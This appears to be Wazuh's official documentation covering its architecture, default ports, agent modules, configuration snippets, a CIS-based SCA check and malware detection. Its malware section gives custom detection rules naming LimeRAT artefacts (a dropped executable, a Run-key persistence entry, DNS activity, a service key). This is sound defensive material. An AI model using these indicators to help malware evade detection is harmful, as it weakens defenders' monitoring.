Index

Getting started with Wazuh

Wazuh is a free and open source security platform that unifies XDR and SIEM capabilities. It protects workloads across on-premises, virtualized, containerized, and cloud-based environments.

Wazuh helps organizations and individuals to protect their data assets against security threats. It is widely used by thousands of organizations worldwide, from small businesses to large enterprises.

Check this Getting Started guide for an overview of the Wazuh platform components, architecture, and common use cases.

Community and support

Wazuh has one of the largest open source security communities in the world. You can become part of it to learn from other users, participate in discussions, talk to our development team, and contribute to the project. The following resources are easily available:

  • Slack channel: Join our community channel to chat with our developers and technical team in a close to real-time experience.

  • Google group: Here you can share questions and learn from other Wazuh users. It is easy to subscribe via email.

  • GitHub repositories: Get access to the Wazuh source code, report issues, and contribute to the project. We happily review and accept pull requests.

  • Discord: Engage with our community in dynamic discussions and collaborations on the latest security trends and Wazuh developments.

  • Reddit: Join our subreddit to share insights, ask questions, and discuss security issues with fellow users.

  • X: Follow us on X for real-time updates, news, and quick tips from our development team and security experts.

  • LinkedIn: Stay updated with our professional network and industry news by connecting with us on LinkedIn.

  • YouTube: Subscribe to our YouTube channel for video tutorials, webinars, and walkthroughs of Wazuh features and configurations.

We also provide professional support, training, and consulting services.

How to install Wazuh

The Wazuh solution is composed of three central platform components and a single universal agent. To install Wazuh in your infrastructure, check the following sections of our documentation:

  • The Quickstart is an automated way of installing Wazuh in just a few minutes.

  • The Installation guide provides instructions on how to install each central component and how to deploy the Wazuh agents.

Wazuh Cloud

The Wazuh Cloud is our software as a service (SaaS) solution. We provide a 14-day free trial for you to create a cloud environment and get the best out of our SaaS solution. Check the Cloud service documentation for more information.

Screenshots

Example dashboards and views: Threat Hunting, Malware detection, File Integrity Monitoring, Vulnerability Detection, MITRE ATT&CK, Security configuration assessment, Summary, Amazon Web Services, GitHub, and PCI DSS.

Components

The Wazuh platform provides XDR and SIEM features to protect your cloud, container, and server workloads. These include log data analysis, intrusion and malware detection, file integrity monitoring, configuration assessment, vulnerability detection, and support for regulatory compliance.

The Wazuh solution is based on the Wazuh agent, which is deployed on the monitored endpoints, and on three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard.

  • The Wazuh indexer is a highly scalable, full-text search and analytics engine. This central component indexes and stores alerts generated by the Wazuh server.

  • The Wazuh server analyzes data received from the agents. It processes the data through decoders and rules, using threat intelligence to look for well-known indicators of compromise (IOCs). A single server can analyze data from hundreds or thousands of agents, and scale horizontally when set up as a cluster. This central component is also used to manage the agents, configuring and upgrading them remotely when necessary.

  • The Wazuh dashboard is the web user interface for data visualization and analysis. It includes out-of-the-box dashboards for threat hunting, regulatory compliance (e.g., PCI DSS, GDPR, CIS, HIPAA, NIST 800-53), detected vulnerable applications, file integrity monitoring data, configuration assessment results, cloud infrastructure monitoring events, and others. It is also used to manage Wazuh configuration and to monitor its status.

  • Wazuh agents are installed on endpoints such as laptops, desktops, servers, cloud instances, or virtual machines. They provide threat prevention, detection, and response capabilities. They run on operating systems such as Linux, Windows, and macOS.

In addition to agent-based monitoring capabilities, the Wazuh platform can monitor agentless devices such as firewalls, switches, routers, or network IDS, among others. For example, log data can be collected from these devices via Syslog, and their configuration can be monitored through periodic probing, via SSH or through an API.
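
For example, below is a minimal sketch of a Wazuh server configuration that accepts Syslog messages from network devices; the port and protocol match the defaults described later in this document, and the allowed IP range is a placeholder to adapt to your network.

<ossec_config>
  <!-- Receive Syslog messages from agentless network devices -->
  <remote>
    <connection>syslog</connection>
    <port>514</port>
    <protocol>udp</protocol>
    <!-- Placeholder range: replace with the addresses of your devices -->
    <allowed-ips>192.168.1.0/24</allowed-ips>
  </remote>
</ossec_config>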

The diagram below represents the Wazuh components and data flow.

Wazuh components and data flow
Wazuh indexer

The Wazuh indexer is a highly scalable, full-text search and analytics engine. This Wazuh central component indexes and stores alerts generated by the Wazuh server and provides near real-time data search and analytics capabilities. The Wazuh indexer can be configured as a single-node or multi-node cluster, providing scalability and high availability.

The Wazuh indexer stores data as JSON documents. Each document correlates a set of keys, field names, or properties with their corresponding values, which can be strings, numbers, Boolean values, dates, arrays of values, geolocations, or other types of data.

An index is a collection of related documents. The documents stored in the Wazuh indexer are distributed across different containers known as shards. By distributing the documents across multiple shards and distributing those shards across various nodes, the Wazuh indexer can ensure redundancy. This protects your system against hardware failures and increases query capacity as nodes are added to a cluster.

We show an image of the Wazuh indexer cluster below:

Wazuh indexer

Wazuh uses several types of indices to store different event types. For details, see the Wazuh indexer indices section of the documentation.

The Wazuh indexer is well-suited for time-sensitive use cases like security analytics and infrastructure monitoring, as it is a near real-time search platform. The latency from the time a document is indexed until it becomes searchable is very short, typically one second.

In addition to its speed, scalability, and resiliency, the Wazuh indexer has several built-in features that make storing and searching data even more efficient, such as data roll-ups, alerting, anomaly detection, and index lifecycle management.

Visit the installation guide and user manual for more information about the Wazuh indexer.

Wazuh server

The Wazuh server is the central component responsible for analyzing data collected from Wazuh agents and agentless devices. It detects threats, anomalies, and regulatory compliance violations in real time, generating alerts when suspicious activity is identified. Beyond detection, the Wazuh server enables centralized management by remotely configuring Wazuh agents and continuously monitoring their operational status.

The Wazuh server leverages multiple threat intelligence sources and enriches alerts with contextual data to enhance detection accuracy. This includes mapping events to the MITRE ATT&CK framework, detecting vulnerabilities with the Wazuh CTI service, and aligning findings with regulatory standards such as PCI DSS, GDPR, HIPAA, CIS benchmarks, and NIST 800-53. These capabilities provide security teams with actionable insights for threat hunting, vulnerability detection, and regulatory compliance monitoring.

The Wazuh server integrates with external platforms to support streamlined workflows. Examples include ticketing systems such as ServiceNow, Jira, and PagerDuty, as well as communication tools like Slack. These integrations help automate incident tracking, accelerate response times, and improve collaboration within security operations teams.

Server architecture

The Wazuh server includes the Analysis engine, the Wazuh server API, the agent enrollment service, the agent connection service, the cluster daemon, and Filebeat. It runs on Linux, whether on physical servers, virtual machines, containers, or cloud instances. On Windows hosts, it can be deployed using Wazuh Docker.

The diagram below shows the Wazuh server architecture and components.

Wazuh server architecture
Server components

The Wazuh server comprises several components, listed below, each with a distinct function such as enrolling new agents, validating each agent's identity, and encrypting communications between the Wazuh agent and the Wazuh server.

  • Agent enrollment service: Registers new Wazuh agents and generates and distributes unique authentication keys to each agent. It runs as a network service and supports TLS and SSL certificate–based authentication, or enrollment using a fixed password.

  • Agent connection service: Manages communication between Wazuh agents and the Wazuh server. It validates Wazuh agent identities using enrollment keys, enforces encryption for secure data transfer, and enables centralized configuration management to push updated agent settings remotely.

  • Analysis engine: At the core of Wazuh threat detection capabilities, the Analysis engine processes received security data using decoders and rules:

    • Decoders classify log types (for example, Windows events, SSH logs, web server logs) and extract relevant fields such as IP addresses, usernames, and event IDs.

    • Rules match decoded events against known patterns to detect threats and anomalies. When triggered, rules generate alerts and invoke incident response actions such as blocking IP addresses, terminating malicious processes, or removing malware artifacts.

  • Wazuh server API: Provides a programmatic interface for interacting with the Wazuh server. It allows administrators using the Wazuh dashboard or the command line to perform actions including, but not limited to, the following:

    • Configure and manage agents or servers

    • Monitor system health and infrastructure status

    • Query alerts and endpoint data

    • Create or update decoders and rules

To learn more, visit the Wazuh server API documentation.

  • Wazuh cluster daemon: Enables horizontal scaling by linking multiple Wazuh servers into a cluster. Using a load balancer provides high availability, fault tolerance, and load distribution. A configuration sketch is shown after this list.

  • Filebeat: Forwards events and alerts from the Wazuh analysis engine to the Wazuh indexer.
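
As an illustration of the cluster daemon described above, below is a minimal sketch of the cluster section of a worker node's configuration file (ossec.conf). The cluster name, node name, key, and master address are placeholders; the same 32-character key must be shared by every node in the cluster.

<ossec_config>
  <cluster>
    <name>wazuh</name>
    <node_name>worker-01</node_name>
    <node_type>worker</node_type>
    <!-- Placeholder key: use the same 32-character key on every node -->
    <key>c98b62a9b6169ac5f67dae55ae4a9088</key>
    <port>1516</port>
    <bind_addr>0.0.0.0</bind_addr>
    <nodes>
      <!-- Placeholder address of the master node -->
      <node>wazuh-master.example.com</node>
    </nodes>
    <hidden>no</hidden>
    <disabled>no</disabled>
  </cluster>
</ossec_config>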

Visit the installation guide and user manual for more information about the Wazuh server.

Wazuh dashboard

The Wazuh dashboard is a flexible and intuitive web interface for visualizing, analyzing, and managing security data. It enables users to investigate events and alerts, oversee the Wazuh platform, and enforce role-based access control (RBAC) and single sign-on (SSO) policies.

Data visualization and analysis

The Wazuh dashboard lets users navigate security data collected from Wazuh agents and agentless devices, and alerts generated by the Wazuh server. It includes dashboards for threat hunting, malware detection, file integrity monitoring, system inventory, and regulatory compliance (for example, PCI DSS, GDPR, HIPAA, and NIST 800-53). You can generate reports and create custom visualizations and dashboards.

Data visualization
Agents monitoring and configuration

The Wazuh dashboard allows users to manage agent configuration and monitor agent status. For each monitored endpoint, users can define which agent modules are enabled, which log files are read, which files are monitored for integrity changes, and which configuration checks are performed.

Agents monitoring
Platform management

The Wazuh dashboard provides a user interface to manage a Wazuh deployment. This includes monitoring the status, logs, and statistics of Wazuh components, configuring the Wazuh server, and creating custom rules and decoders for log analysis and threat detection.

Platform management
Developer tools

The Wazuh dashboard includes a ruleset test tool that processes log messages to show how they are decoded and whether they match a detection rule. This is useful when testing custom decoders and rules.

Ruleset test

The Wazuh dashboard also includes API consoles for interacting with the Wazuh server and the Wazuh indexer API. They are used to manage the Wazuh server capabilities or interact with Wazuh indexer indices.

Wazuh server API

Wazuh server API console

Wazuh indexer API

Wazuh indexer API console
Wazuh agent

The Wazuh agent runs on Linux, Windows, and macOS operating systems. It can be deployed to laptops, desktops, servers, cloud instances, containers, or virtual machines. The Wazuh agent helps to protect your system by providing threat prevention, detection, and response capabilities. It is also used to collect different types of system and application data that it forwards to the Wazuh server through an encrypted and authenticated channel.

Agent architecture

The Wazuh agent has a modular architecture. Each module is in charge of its own tasks, including monitoring the file system, reading log files, collecting inventory data, scanning the system configuration, and looking for malware. Users can manage agent modules through configuration settings, adapting the solution to their specific use cases.

The diagram below shows the agent architecture and modules.

Agent architecture
Wazuh agent modules

All agent modules are configurable and perform different security tasks. This modular architecture allows you to configure each module according to your security needs. The following list summarizes the purposes of the Wazuh agent modules.

  • Log collector: Reads flat log files and Windows events, collecting operating system and application log messages. It supports XPath filters for Windows events and recognizes multi-line formats like Linux Audit logs. It can also enrich JSON events with additional metadata. A configuration sketch covering this module is shown after this list.

  • Command execution: Runs authorized commands periodically, collecting their output and reporting it back to the Wazuh server for further analysis. You can use this module for different purposes, such as monitoring available disk space or getting a list of recently logged-in users.

  • File integrity monitoring (FIM): Monitors the file system, reporting when files are created, deleted, or modified. It keeps track of changes in file attributes, permissions, ownership, and content. When an event occurs, it captures who, what, and when details in real time.

  • Security configuration assessment (SCA): Provides continuous configuration assessment, utilizing out-of-the-box checks based on the Center for Internet Security (CIS) benchmarks. Users can also create their own SCA checks to monitor and enforce their security policies.

  • System inventory: Periodically runs scans to collect inventory data such as operating system version, network interfaces, running processes, installed applications, and a list of open ports. Scan results are stored in local SQLite databases that can be queried remotely.

  • Malware detection: Uses a non-signature-based approach to detect anomalies and the possible presence of rootkits. It also looks for hidden processes, hidden files, and hidden ports while monitoring system calls.

  • Active Response: Runs automatic actions when threats are detected, triggering responses to block a network connection, stop a running process, or delete a malicious file. Users can also create custom responses when required, for example, responses for running a binary in a sandbox, capturing network traffic, and scanning a file with an antivirus.

  • Container security monitoring: Integrates with the Docker Engine API to monitor changes in a containerized environment. For example, it detects changes to container images, network configuration, or data volumes. It alerts about containers running in privileged mode and about users executing commands in a running container.

  • Cloud security monitoring: Monitors cloud providers such as Amazon Web Services, Microsoft Azure, or Google Cloud Platform (GCP), communicating natively with their APIs. It detects changes to the cloud infrastructure, for example, when a new user is created, a security group is modified, or a cloud instance is stopped. Additionally, it collects cloud service log data such as AWS CloudTrail, GCP Pub/Sub, and Azure Active Directory.
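
The modules listed above are enabled and tuned in the agent configuration file (ossec.conf). The snippet below is a minimal sketch, assuming a Linux agent, that shows the log collector reading an authentication log and the command execution module reporting available disk space; the log path and interval are illustrative.

<ossec_config>
  <!-- Log collector: read an operating system log file -->
  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/auth.log</location>
  </localfile>

  <!-- Command execution: report available disk space every hour -->
  <localfile>
    <log_format>command</log_format>
    <command>df -P</command>
    <frequency>3600</frequency>
  </localfile>
</ossec_config>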

Communication with Wazuh server

The Wazuh agent communicates with the Wazuh server to ship collected data and security-related events. The Wazuh agent also sends operational data, reporting its configuration and status. Once connected, the agent can be upgraded, monitored, and configured remotely from the Wazuh server.

The communication between the Wazuh agent and the Wazuh server takes place through a secure channel (TCP or UDP), providing data encryption and compression in real time. Additionally, it includes flow control mechanisms to avoid flooding, queueing events when necessary, and protecting the network bandwidth.

You need to enroll the Wazuh agent before connecting it to the Wazuh server for the first time. This process provides the agent with a unique key used for authentication and data encryption.
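
As a rough sketch of this setup, the agent-side ossec.conf below points an agent at a Wazuh server and enables password-based enrollment. The server address is a placeholder, and the password file path shown is the default location, relative to the Wazuh installation directory.

<ossec_config>
  <client>
    <server>
      <!-- Placeholder address of the Wazuh server -->
      <address>wazuh-server.example.com</address>
      <port>1514</port>
      <protocol>tcp</protocol>
    </server>
    <enrollment>
      <enabled>yes</enabled>
      <port>1515</port>
      <!-- Enroll using the password stored on the agent -->
      <authorization_pass_path>etc/authd.pass</authorization_pass_path>
    </enrollment>
  </client>
</ossec_config>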

Architecture

The Wazuh architecture is composed of a multi-platform Wazuh agent and three central components: the Wazuh server, Wazuh indexer, and Wazuh dashboard. The agent is deployed on endpoints to collect and forward security data to the Wazuh server for analysis. The analyzed data is then forwarded to the Wazuh indexer for indexing and storage, and subsequently to the Wazuh dashboard for alerting and visualization.

Wazuh also supports agentless monitoring for systems and devices where installing the Wazuh agent is not possible. Network devices such as firewalls, switches, routers, and access points can actively forward log data via Syslog and SSH.

The Wazuh central components can be deployed in different ways, depending on scalability and availability needs:

  • All-in-one deployment: All Wazuh components (server, indexer, and dashboard) are installed on a single server. Best suited for labs and small environments with a limited number of monitored endpoints.

  • Single-node deployment: The Wazuh server, indexer, and dashboard are each deployed on separate servers. Recommended for medium environments that require higher performance than an all-in-one setup.

  • Multi-node deployment: Typically, one instance of the Wazuh dashboard and multiple instances of the Wazuh server (Wazuh server cluster) and the Wazuh indexer (Wazuh indexer cluster) are deployed on separate servers. The number of instances varies depending on your needs. This deployment is recommended for large environments with high event throughput, or when fault tolerance and high availability are required.

Visit the installation guide and installation alternatives documentation to learn about the different ways to deploy Wazuh.

The diagram below represents a Wazuh deployment architecture. It shows how the Wazuh server and the Wazuh indexer nodes can be configured as clusters, providing load balancing and high availability.

Deployment architecture
Component communication
Wazuh agent - Wazuh server

The Wazuh agent continuously sends events to the Wazuh server for analysis and threat detection. To start shipping this data, the agent establishes a connection with the Wazuh server agent connection service, which listens on TCP port 1514 by default (this is configurable). The Wazuh server then decodes the received events and matches them against rules using the Analysis engine.
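
A minimal sketch of the corresponding server-side configuration is shown below; it keeps the default port and protocol and is only meant to illustrate where these values are set.

<ossec_config>
  <!-- Agent connection service on the Wazuh server -->
  <remote>
    <connection>secure</connection>
    <port>1514</port>
    <protocol>tcp</protocol>
  </remote>
</ossec_config>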

The Wazuh messages protocol uses AES encryption with 128 bits per block and 256-bit keys.

Note

Read the Benefits of using AES in the Wazuh communications document for more information.

Wazuh server - Wazuh indexer

The Wazuh server uses Filebeat to send alert and event data to the Wazuh indexer, using TLS encryption. Filebeat reads the Wazuh server output data and sends it to the Wazuh indexer (by default listening on port 9200/TCP). Once the data is indexed by the Wazuh indexer, the Wazuh dashboard is used to query and visualize the security information.

Wazuh dashboard - Wazuh server/Wazuh indexer

The Wazuh dashboard queries the Wazuh server API (by default listening on port 55000/TCP on the Wazuh server) to display configuration and status-related information of the Wazuh server and agents. This communication is encrypted with TLS and authenticated with a username and password.

The Wazuh dashboard visualizes and queries the information indexed on the Wazuh indexer.

Required ports

Wazuh components communicate using several services. The list of default ports used by these services is shown below. Users can modify these port numbers when necessary.

Component         Port       Protocol         Purpose

Wazuh server      1514       TCP              Agent connection service
                  1515       TCP              Agent enrollment service
                  1516       TCP              Wazuh cluster daemon
                  514        UDP (default)    Wazuh Syslog collector (disabled by default)
                  514        TCP (optional)   Wazuh Syslog collector (disabled by default)
                  55000      TCP              Wazuh server RESTful API

Wazuh indexer     9200       TCP              Wazuh indexer RESTful API
                  9300-9400  TCP              Wazuh indexer cluster communication

Wazuh dashboard   443        TCP              Wazuh web user interface

Wazuh CTI

The Wazuh Cyber Threat Intelligence (CTI) service is a publicly accessible platform that collects, analyzes, and disseminates actionable information on emerging cyber threats and vulnerabilities. This service currently focuses on vulnerability intelligence, delivering timely updates on Common Vulnerabilities and Exposures (CVEs), severity scores, exploitability insights, and mitigation strategies. It aggregates and sanitizes data from trusted sources, including operating system vendors and major vulnerability databases, to ensure high-quality, relevant intelligence.

This service is integrated directly with the Wazuh Vulnerability Detection module, but is also publicly available at the Wazuh CTI website.

Use cases

The Wazuh platform helps organizations and individuals protect their data assets through threat prevention, detection, and response. Wazuh is also employed to meet regulatory compliance requirements, such as PCI DSS or HIPAA, and configuration standards like CIS hardening guides.

Wazuh is also a solution for IaaS users (Amazon Web Services, Microsoft Azure, or Google Cloud) to monitor virtual machines and cloud instances. This is done at the system level using the Wazuh security agent and at the infrastructure level by pulling data directly from the cloud provider API.

Additionally, Wazuh is employed to protect containerized environments by providing cloud-native runtime security. This capability is based on an integration with the Docker Engine API and the Kubernetes API. The Wazuh security agent can run on the Docker host, providing a complete set of threat detection and response capabilities.

Below you can find examples of some of the most common use cases of the Wazuh platform.

  • Endpoint security
  • Threat intelligence
  • Security operations
  • Cloud security
  • Configuration assessment
  • Threat hunting
  • Incident response
  • Container security
  • Malware detection
  • Log data analysis
  • Regulatory compliance
  • Posture management
  • File integrity monitoring
  • Vulnerability detection
  • IT hygiene
  • Workload protection

Configuration assessment

Configuration assessment is a process that verifies whether endpoints adhere to a set of predefined rules regarding configuration settings and approved application usage. It involves comparing the current configuration against established industry standards and organizational policies to identify vulnerabilities and misconfigurations.

Regular configuration assessments are essential in maintaining a secure and compliant environment, as they help organizations proactively identify and patch vulnerabilities. This practice strengthens security controls and minimizes the risk of security incidents.

Wazuh SCA module

Wazuh offers a Security Configuration Assessment (SCA) module that assists security teams in scanning for and detecting misconfigurations within their environment. The Wazuh agent uses policy files to scan endpoints that it monitors. These files contain predefined checks to be carried out on each monitored endpoint.

Wazuh includes SCA policies out-of-the-box based on the Center for Internet Security (CIS) security benchmarks. These benchmarks serve as essential guidelines on best practices for protecting IT systems and data from cyberattacks. They provide clear instructions for establishing a secure baseline configuration and offer guidance to ensure that users implement effective measures to safeguard their critical assets and mitigate potential vulnerabilities. By adhering to these standards, you can enhance your overall security posture and mitigate the risk of cyber threats against your business.

Some other benefits of the Wazuh Security Configuration Assessment (SCA) module include:

  • Security posture management: Wazuh SCA helps organizations ensure that their endpoints are configured securely. This minimizes vulnerabilities resulting from misconfigurations and reduces the risk of security breaches.

  • Compliance monitoring: It allows organizations to assess and implement compliance with regulatory standards, best practices, and internal security policies.

  • Continuous monitoring: Wazuh SCA continuously monitors the configuration of the endpoints and alerts when it discovers misconfigurations.

Overview of Wazuh SCA policies

The Wazuh SCA module uses policies written in YAML format. Each policy consists of checks, and each check comprises one or more rules. These rules can examine various aspects of an endpoint, such as the presence of files, directories, Windows registry keys, running processes, and more.

By default, the Wazuh agent runs scans for every policy (.yaml or .yml files) present in the ruleset directory. This directory can be found in the following locations on every operating system that runs the Wazuh agent:

  • Linux and Unix-based agents: /var/ossec/ruleset/sca.

  • Windows agents: C:\Program Files (x86)\ossec-agent\ruleset\sca.

  • macOS agents: /Library/Ossec/ruleset/sca.

Wazuh also allows you to create custom policies that can be used to scan endpoints and verify if they conform to your organization’s policies.
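
For example, a custom policy can be enabled by referencing its file from the SCA block of the agent configuration, as in the sketch below; the policy file path is a hypothetical example and the remaining values are the usual defaults.

<ossec_config>
  <sca>
    <enabled>yes</enabled>
    <scan_on_start>yes</scan_on_start>
    <interval>12h</interval>
    <skip_nfs>yes</skip_nfs>
    <policies>
      <!-- Hypothetical custom policy file distributed to the agent -->
      <policy>/var/ossec/etc/shared/custom_sca_policy.yml</policy>
    </policies>
  </sca>
</ossec_config>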

Below is a snippet of the CIS policy file /var/ossec/ruleset/sca/cis_ubuntu22-04.yml, which is included out of the box for Ubuntu 22.04 endpoints. This SCA policy, based on the CIS benchmarks, runs checks on the endpoint to determine whether it conforms to best practices for system hardening. The check with ID 28500 verifies whether the /tmp directory is on a separate partition.

- id: 28500
  title: "Ensure /tmp is a separate partition."
  description: "The /tmp directory is a world-writable directory used for temporary storage by all users and some applications."
  rationale: "Making /tmp its own file system allows an administrator to set additional mount options such as the noexec option on the mount, making /tmp useless for an attacker to install executable code. It would also prevent an attacker from establishing a hard link to a system setuid program and wait for it to be updated. Once the program was updated, the hard link would be broken and the attacker would have his own copy of the program. If the program happened to have a security vulnerability, the attacker could continue to exploit the known flaw. This can be accomplished by either mounting tmpfs to /tmp, or creating a separate partition for /tmp."
  impact: "Since the /tmp directory is intended to be world-writable, there is a risk of resource exhaustion if it is not bound to a separate partition. Running out of /tmp space is a problem regardless of what kind of filesystem lies under it, but in a configuration where /tmp is not a separate file system it will essentially have the whole disk available, as the default installation only creates a single / partition. On the other hand, a RAM-based /tmp (as with tmpfs) will almost certainly be much smaller, which can lead to applications filling up the filesystem much more easily. Another alternative is to create a dedicated partition for /tmp from a separate volume or disk. One of the downsides of a disk-based dedicated partition is that it will be slower than tmpfs which is RAM-based. /tmp utilizing tmpfs can be resized using the size={size} parameter in the relevant entry in /etc/fstab."
  remediation: "First ensure that systemd is correctly configured to ensure that /tmp will be mounted at boot time. # systemctl unmask tmp.mount For specific configuration requirements of the /tmp mount for your environment, modify /etc/fstab or tmp.mount. Example of /etc/fstab configured tmpfs file system with specific mount options: tmpfs 0 /tmp tmpfs defaults,rw,nosuid,nodev,noexec,relatime,size=2G 0 Example of tmp.mount configured tmpfs file system with specific mount options: [Unit] Description=Temporary Directory /tmp ConditionPathIsSymbolicLink=!/tmp DefaultDependencies=no Conflicts=umount.target Before=local-fs.target umount.target After=swap.target [Mount] What=tmpfs Where=/tmp Type=tmpfs."
  references:
    - https://www.freedesktop.org/wiki/Software/systemd/APIFileSystems/
    - https://www.freedesktop.org/software/systemd/man/systemd-fstab-generator.html
  compliance:
    - cis: ["1.1.2.1"]
    - cis_csc_v7: ["14.6"]
    - cis_csc_v8: ["3.3"]
    - mitre_techniques: ["T1499", "T1499.001"]
    - mitre_tactics: ["TA0005"]
    - mitre_mitigations: ["M1022"]
    - cmmc_v2.0: ["AC.L1-3.1.1", "AC.L1-3.1.2", "AC.L2-3.1.5", "AC.L2-3.1.3", "MP.L2-3.8.2"]
    - hipaa: ["164.308(a)(3)(i)", "164.308(a)(3)(ii)(A)", "164.312(a)(1)"]
    - pci_dss_v3.2.1: ["7.1", "7.1.1", "7.1.2", "7.1.3"]
    - pci_dss_v4.0: ["1.3.1", "7.1"]
    - nist_sp_800-53: ["AC-5", "AC-6"]
    - soc_2: ["CC5.2", "CC6.1"]
  condition: all
  rules:
    - 'c:findmnt --kernel /tmp -> r:\s*/tmp\s'
    - "c:systemctl is-enabled tmp.mount -> r:generated|enabled"

The /tmp directory is used to store data that is needed for a short time by system and user applications. Mounting /tmp on a separate partition allows an administrator to set additional mount options such as noexec, nodev, and nosuid, making the directory useless for an attacker trying to install executable code. The SCA policy file also gives recommendations on how to remediate this issue.

Viewing SCA results

The Wazuh dashboard has a Configuration Assessment module that allows you to view SCA scan results for each agent.

Configuration Assessment module
Interpreting SCA results

The image below shows the policy based on the CIS benchmark for Ubuntu Linux 22.04 LTS. You can see that 191 checks were run against the Ubuntu 22.04 endpoint. Out of these, 56 passed, 87 failed, and 48 are not applicable to the endpoint. It also shows a score of 39%, which is calculated from the number of checks passed.

Policy for CIS benchmark for Ubuntu 22.04 checks

You can click on the checks to get more information. In the image below, you can see information such as rationale, remediation, and a description of the check with ID 3003.

Results for CIS benchmark for Ubuntu 22.04 check ID 3003

The SCA scan result above shows a failed status because public key authentication is not enabled for SSH. If the remediation is implemented, the result changes to passed, thereby improving the security of the endpoint.

Implementing SCA remediation steps

In the example in the previous section, implementing the remediation provided by the Wazuh SCA module improves the security of the endpoint. This involves changing the PubkeyAuthentication option value in the sshd_config file. In the image below, you can see that the status of check 3003 has changed to passed.

Status passed for the check 3003

By utilizing the Wazuh SCA module, you can detect misconfigurations, remediate them, and verify that your endpoints adhere to industry best practices. This proactive approach significantly reduces the likelihood of security breaches within your environment.

Malware detection

Malware, short for malicious software, refers to any software specifically designed to harm or exploit computer systems, networks, or users. It is created with the intention of gaining unauthorized access, causing damage, stealing sensitive information, or performing other malicious activities on a target system. There are various types of malware, each with specific functions and infection methods. Some common types of malware include viruses, worms, ransomware, botnets, spyware, trojans, and rootkits.

Malware detection is crucial for safeguarding computer systems and networks from cyber threats. It helps identify and mitigate malicious software that can cause a data breach, system compromise, and financial loss.

Wazuh for malware detection

Traditional methods, which rely solely on signature-based detections, have limitations and fail to capture new threats. Signature-based approaches struggle with detecting zero-day attacks, polymorphic malware, and other evasion techniques employed by threat actors. As a result, organizations are at risk of undetected breaches and data exfiltration. Wazuh empowers organizations to detect and respond to sophisticated and evasive threats effectively. Wazuh encompasses different modules that identify malware properties, activities, network connections, and more.

Detecting malicious activities with threat detection rules

Wazuh has threat detection rules that enable behavior-based malware detection. Instead of relying solely on predefined signatures, Wazuh focuses on monitoring and analyzing abnormal behavior exhibited by malware. This allows Wazuh to detect known and previously unknown threats. This way, Wazuh provides a proactive and adaptable defense against cyber threats. Wazuh has out-of-the-box rulesets that are specifically designed to trigger alerts for recognized malware patterns, providing a quick response to potential security incidents. For example, the image below shows an alert with rule ID 92213 triggered when an executable is dropped in a folder commonly used by malware. This alert prompts security teams to begin the investigation and remediation process.

Executable dropped in folder used by malware alert

Wazuh allows users to create custom rules for more flexibility in detection, empowering them to focus on relevant activities, and optimizing malware detection. Wazuh decodes and organizes logs from monitored endpoints into fields, which can then be utilized to create custom rules for alerting when malicious activity is detected.

Wazuh rules use multiple fields that denote indicators of compromise (IOCs) to reduce false positives and detect known malware based on specific behaviors. These rules can connect related malware activities, such as intrusion, privilege escalation, lateral movement, obfuscation, and exfiltration for comprehensive detection.

Below is an example of some Wazuh custom rules created to alert on malicious activities of the LimeRAT malware:

<group name="lime_rat,sysmon,">

  <!-- Rogue checker netflix.exe creation -->
  <rule id="100024" level="12">
    <if_sid>61613</if_sid>
    <field name="win.eventdata.image" type="pcre2">\.exe</field>
    <field name="win.eventdata.targetFilename" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <description>Potential LimeRAT activity detected: checker netflix.exe created at $(win.eventdata.targetFilename) by $(win.eventdata.image).</description>
    <mitre>
      <id>T1036</id>
    </mitre>
  </rule>

  <!-- Registry key creation for persistence -->
  <rule id="100025" level="12">
    <if_group>sysmon</if_group>
    <field name="win.eventdata.details" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <field name="win.eventdata.targetObject" type="pcre2" >HKU\\\\.+\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\checker netflix\.exe</field>
    <field name="win.eventdata.eventType" type="pcre2" >^SetValue$</field>
    <description>Potential LimeRAT activity detected:  $(win.eventdata.details) added itself to the Registry as a startup program $(win.eventdata.targetObject) to establish persistence.</description>
    <mitre>
      <id>T1547.001</id>
    </mitre>
  </rule>

  <!-- Network activity detection -->
  <rule id="100026" level="12">
    <if_sid>61605</if_sid>
    <field name="win.eventdata.image" type="pcre2">(?i)[c-z]:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\checker netflix\.exe</field>
    <description>Potential LimeRAT activity detected: Suspicious DNS query made by $(win.eventdata.image).</description>
    <mitre>
      <id>T1572</id>
    </mitre>
  </rule>


  <!-- LimeRAT service creation -->
  <rule id="100028" level="12">
    <if_sid>61614</if_sid>
    <field name="win.eventdata.targetObject" type="pcre2">HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\disk</field>
    <field name="win.eventdata.eventType" type="pcre2">^CreateKey$</field>
    <description>Potential LimeRAT activity detected: LimeRAT service $(win.eventdata.targetObject) has been created on $(win.system.computer).</description>
    <mitre>
      <id>T1543.003</id>
    </mitre>
  </rule>

</group>

These rules create alerts that are visible in the Threat Hunting module on the Wazuh dashboard.

LimeRAT custom alerts example

Refer to the blog post on LimeRat detection and response with Wazuh for the full configuration.

When Wazuh identifies behavior indicative of malware, it generates real-time alerts and notifications, enabling security teams to respond swiftly and mitigate potential risks before they escalate.

Leveraging file integrity monitoring for detecting malware activity

File Integrity Monitoring (FIM) is a valuable component in malware detection. Wazuh provides FIM capabilities to monitor and detect changes to files and directories on monitored endpoints. These changes include creation, modification, or deletion. While FIM provides essential insights, combining it with other capabilities and integrations further enhances its effectiveness for malware detection. Wazuh allows security teams to create custom rules based on FIM events, enabling targeted malware detection. These customizable rules correlate FIM events with specific indicators of compromise such as suspicious file extensions, code snippets, or known malware signatures.

The image below shows an alert when a web shell creates or modifies a file on a web server.

Web shell FIM alert

Malware frequently targets the Windows Registry to achieve malicious objectives, such as establishing persistence and performing other malicious actions. The Wazuh File Integrity Monitoring (FIM) module includes Windows Registry monitoring, which watches commonly targeted registry paths for modifications. When changes occur, the FIM module triggers real-time alerts, empowering security teams to swiftly identify and respond to suspicious registry key manipulation.

The images below display the Wazuh FIM module dashboard and events of Windows Registry modifications.

Windows registry modifications in FIM module dashboard
FIM module with Windows Registry modification events
Enhancing malware detection with threat intelligence integration

